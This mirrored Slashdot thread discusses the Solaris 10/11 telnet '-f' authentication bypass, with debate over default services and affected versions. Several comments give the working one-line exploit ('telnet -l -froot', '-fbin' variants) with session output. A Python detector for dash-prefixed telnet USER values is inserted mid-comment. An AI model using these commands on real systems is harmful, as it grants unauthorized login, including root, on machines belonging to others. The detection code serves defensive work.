Slashdot Mirror


Solaris Telnet 0-day vulnerability

philos writes "According to SANS ISC, there's a vulnerability in Solaris 10 and 11 telnet that allows anyone to remotely connect as any account, including root, without authentication. Remote access can be gained with nothing more than a telnet client. More information and a Snort signature can be found at riosec.com. Worse, this is almost identical to a bug in AIX and Linux rlogin from way back in 1994."

17 of 342 comments

  1. Re:Why is this a big deal? by drsmithy · · Score: 3, Informative

    Who the hell even THINKS about enabling telnet on any box these days?

    Sun, apparently, since it's enabled by default.

  2. Re:Here come the fanboys by SatanicPuppy · · Score: 4, Informative

    Just because it's not deployed in many places, doesn't mean that those places aren't cracker dream targets...I've got 5 Solaris machines, and the least critical of them is a far better target than the most critical Windows, or even Linux box.

    Still, first poster is right. Wtf uses telnet anymore, unless they're dealing with the most legacy of legacy crap.

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.

  3. Re:Telnet? by Anonymous Coward · · Score: 3, Informative

    Solaris 8, 9, 10 -- all have telnet, ftp, rlogin and others enabled by default at a clean install.
    You can check it for yourself in vmware, if you do not believe.

  4. Re:Why is this a big deal? by Nasarius · · Score: 3, Informative

    Quicker than SSH? What the hell? Are you streaming video over your SSH connection or what?
    I think GP is referring to the initial connect handshake. Oh no, it takes an extra 500ms to establish a secure connection. If your network is private enough to feel safe using telnet, you can certainly set up RSA/DSA keys to use SSH without a password, eliminating the time it takes to enter it.
    --
    LOAD "SIG",8,1

  5. Re:Configuration issue by walt-sjc · · Score: 4, Informative

    Since apparently Sun is negligent enough to have telnet enabled by default, it is an important story. This reminds me of the old NT4 days, where every service on the machine was enabled by default, and the first thing you had to do was turn everything off. Come on Sun, get with program here...

  6. Re:0-day? by walt-sjc · · Score: 4, Informative

    No, zero day means that an exploit was released before or on the same day as the vendor / community found out about it. Ethical security researchers notify the vendor first, and at LEAST give them a few days / weeks to resolve the problem before releasing the full details to the public.

  7. Re:Why is this a big deal? by dknj · · Score: 5, Informative

    except it's not... (at least not as of the 10/06 release)

  8. Re:Here come the fanboys by SatanicPuppy · · Score: 5, Informative

    Sure, but that's not what's being discussed. There is a world of difference between using telnet to fake some other non-encrypted protocol, and leaving the telnet service enabled on your machine.

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.

  9. The Exploit by biftek · · Score: 3, Informative

    Since noone seems to have bothered posting it yet, "telnet -l -frandomuser randomsolarishost".

    So stupid.

  10. Re:Configuration issue by zdzichu · · Score: 4, Informative

    The article talks about Solaris 10 u1 released in 2005. The latest thing is u3, which has two things:

    1) this attack does not work:

    Escape character is '^]'.
    Not on system console
    Connection closed by foreign host.

    2) when installing U3 one can opt to close most services. This could be also done after installation with "netservices limited" command.

    --
    :wq

  11. Didn't work on Solaris 10 01/06 by jaymzter · · Score: 4, Informative

    rhlinux1:~$ telnet -l"-froot" solaris
    Trying 172.16.141.27...
    Connected to solaris.example.com (172.16.141.27).
    Escape character is '^]'.
    Not on system console
    Connection closed by foreign host

    This is basically a vanilla install.
    --
    If thou see a fair woman pay court to her, for thus thou wilt obtain love

    1. Re:Didn't work on Solaris 10 01/06 by Anonymous Coward · · Score: 3, Informative

      telnet -l"-fbin" solaris

  12. Re:Why is this a big deal? by 99BottlesOfBeerInMyF · · Score: 5, Informative

    Who the hell even THINKS about enabling telnet on any box these days?

    Sadly, a whole lot of people. I work for a company that makes very expensive and cool specialty servers that perform certain security related functions. As a security company, naturally we take care not to tarnish our reputation by leaving these servers vulnerable themselves. We try to encourage our customers to be moderately responsible as well, as any box can be made insecure. I know of at least one tier-1 ISP that has one of our boxes sitting publicly accessible with telnet enabled and no IP access restrictions.

    As for who uses telnet in general, most ISPs in Asia seem to use telnet to configure their systems via their control networks. Large financial institutions in Europe use telnet, as use of encryption is restricted on their trusted networks, for reasons of transparency to the stock regulating authorities. ISPs in South America often use telnet and provide shell accounts to customers. I'm sure there are more groups that use it for one reason or another.

  13. Re:Why is this a big deal? by jaymzter · · Score: 3, Informative

    I have 11/06, and believe me, I was surprised to find telnet enabled.

    --
    If thou see a fair woman pay court to her, for thus thou wilt obtain love

  14. Re:Why is this a big deal? by arth1 · · Score: 3, Informative

    Since the exploit site didn't yet have information about older versions of Solaris/SunOS, I hope it can quench the panic for some when I say that only Solaris 10+ appears to be affected.

    If you're on Solaris 8 (SunOS 5.8 or Solaris 2.5.8) or 9 (SunOS 5.9, or Solaris 2.5.9), you appear to be safe.

    This is relevant because large companies seldom jump to the newer versions until they have to - for production systems, as long as the older versions are supported and working, that's more important than gambling on existing software still working if upgrading the OS. So there's an awful lot of systems with Solaris 8 and 9 out there, but luckily they appear not to be affected.

  15. Re:Configuration issue by moyix · · Score: 3, Informative

    This is only because root is not allowed to log in remotely by default. "-fanyotheruser" will still work. I believe the current favorite is "-fbin". Also, if you've commented out the console line in /etc/default/login, it will allow access to root.

    This has been confirmed on the latest version of Solaris 10.
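The comments above show the trigger ("telnet -l -fsomeuser") and the summary points at a Snort signature for it. As an added, defender-side example that is not from the article or any commenter: the telnet client sends the -l username to the server in a NEW-ENVIRON (RFC 1572) subnegotiation as the USER variable, so a network sensor can flag USER values that start with an option dash, which is what the following Python parser does over a constructed sample of negotiation bytes (it does not handle IAC-doubling inside values, an assumption noted in the code).

```python
# Telnet protocol constants (RFC 854 / RFC 1572).
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 39
IS, SEND, INFO = 0, 1, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def iter_subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE in the stream.
    Assumption: values contain no doubled IAC bytes (not handled here)."""
    i = 0
    while True:
        start = stream.find(bytes([IAC, SB]), i)
        end = stream.find(bytes([IAC, SE]), start + 2) if start >= 0 else -1
        if start < 0 or end < 0:
            return
        body = stream[start + 2:end]
        yield body[0], body[1:]
        i = end + 2


def parse_new_environ(payload: bytes) -> dict:
    """Parse a NEW-ENVIRON IS/INFO payload into {name: value}."""
    env, name, value, cur, i = {}, None, None, None, 1
    if not payload or payload[0] not in (IS, INFO):
        return env
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):            # start of a new variable name
            if name is not None:
                env[name.decode(errors="replace")] = (value or b"").decode(errors="replace")
            name, value = bytearray(), None
            cur = name
        elif b == VALUE:                   # start of that variable's value
            value = bytearray()
            cur = value
        elif b == ESC:                     # next byte is literal
            i += 1
            if cur is not None and i < len(payload):
                cur.append(payload[i])
        elif cur is not None:
            cur.append(b)
        i += 1
    if name is not None:
        env[name.decode(errors="replace")] = (value or b"").decode(errors="replace")
    return env


def suspicious_logins(stream: bytes) -> list:
    """Return USER values that look like login(1) options, e.g. '-froot'."""
    hits = []
    for opt, payload in iter_subnegotiations(stream):
        if opt == NEW_ENVIRON:
            user = parse_new_environ(payload).get("USER", "")
            if user.startswith("-"):
                hits.append(user)
    return hits


# Constructed sample: one malicious USER="-froot" and one benign USER="alice".
SAMPLE = (
    bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE]) + b"-froot" + bytes([IAC, SE])
    + bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE]) + b"alice" + bytes([IAC, SE])
)
```

Run on a live capture, the same check would also catch the "-fbin" variant discussed above, since any USER beginning with "-" is reported.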

  16. Re:Why is this a big deal? by evilviper · · Score: 3, Informative

    Just because the login is "safe" doesn't mean that using an unencrypted protocol is ever a good idea.

    You're right... No more secure websites for you, since HTTPS is just HTTP over an SSL data stream.

    You could just as easily use Kerberos to encrypt HTTP traffic as SSL, and that is indeed exactly what Kerberos does for just about any communications protocol...

    Kerberos telnet is as encrypted as it gets.
    --
    Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant